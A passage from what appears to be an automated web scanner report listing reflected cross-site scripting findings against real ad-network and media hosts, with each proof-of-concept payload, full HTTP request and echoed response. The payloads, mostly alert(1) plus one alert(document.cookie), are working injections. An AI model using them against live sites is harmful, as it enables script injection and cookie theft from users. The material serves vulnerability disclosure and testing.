Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 06-Aug-2011 02:33:21 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 02:33:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4570044593317657583&fpid=933c7"><script>alert(1)</script>c46c0426e93&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 482b7'%3balert(1)//1faf0348dc7 was submitted in the admeld_adprovider_id parameter. This input was echoed as 482b7';alert(1)//1faf0348dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73482b7'%3balert(1)//1faf0348dc7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:28 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73482b7';alert(1)//1faf0348dc7&external_user_id=3297869551067506954"/>');

1.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e99'%3balert(1)//df4307a598c was submitted in the admeld_callback parameter. This input was echoed as f8e99';alert(1)//df4307a598c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8e99'%3balert(1)//df4307a598c HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:31 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchf8e99';alert(1)//df4307a598c?admeld_adprovider_id=73&external_user_id=3297869551067506954"/>');

1.50. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>501477c8a8d was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A0C863B2E23E60DAB8555153C303FBD7; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 01:03:45 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
E_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d".replace(/[^\w\d]/g,""),"amRZRPmRXMjwy5CP_1630363543f1<script>
...[SNIP]...

1.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85eca"-alert(1)-"6337c1d9bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&85eca"-alert(1)-"6337c1d9bd9=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:04:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 07 Feb 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?85eca"-alert(1)-"6337c1d9bd9=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=4252970181";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

1.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66893"-alert(1)-"f7383b9f650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?66893"-alert(1)-"f7383b9f650=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-971151739-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:23 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041083649v-1n-12mc+1297041083649mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://au.ign.com/?66893"-alert(1)-"f7383b9f650=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49dc"><script>alert(1)</script>ff0d8373217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c49dc"><script>alert(1)</script>ff0d8373217=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1049822303-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041067781v-1n-12mc+1297041067781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://au.ign.com/?c49dc"><script>alert(1)</script>ff0d8373217=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9ae6f<script>alert(1)</script>fb23142505d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39ae6f<script>alert(1)</script>fb23142505d&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39ae6f<script>alert(1)</script>fb23142505d", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload bc307<script>alert(1)</script>c7e2144cf48 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128bc307<script>alert(1)</script>c7e2144cf48&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128bc307<script>alert(1)</script>c7e2144cf48", c15:"", c16:"", r:""});

1.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f4867<script>alert(1)</script>f5db88b0abc was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128&c15=f4867<script>alert(1)</script>f5db88b0abc HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128", c15:"f4867<script>alert(1)</script>f5db88b0abc", c16:"", r:""});

1.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c2ee2<script>alert(1)</script>bd3b80d854e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537c2ee2<script>alert(1)</script>bd3b80d854e&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537c2ee2<script>alert(1)</script>bd3b80d854e", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc11<script>alert(1)</script>92bb80ca587 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=47329789dc11<script>alert(1)</script>92bb80ca587&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"47329789dc11<script>alert(1)</script>92bb80ca587", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3c4c3<script>alert(1)</script>6d16a689337 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=405543293c4c3<script>alert(1)</script>6d16a689337&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"405543293c4c3<script>alert(1)</script>6d16a689337", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ae4e2<script>alert(1)</script>f3f65b08d45 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626ae4e2<script>alert(1)</script>f3f65b08d45&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626ae4e2<script>alert(1)</script>f3f65b08d45", c6:"", c10:"", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 518e0<script>alert(1)</script>654ad6dd3fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6=518e0<script>alert(1)</script>654ad6dd3fa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
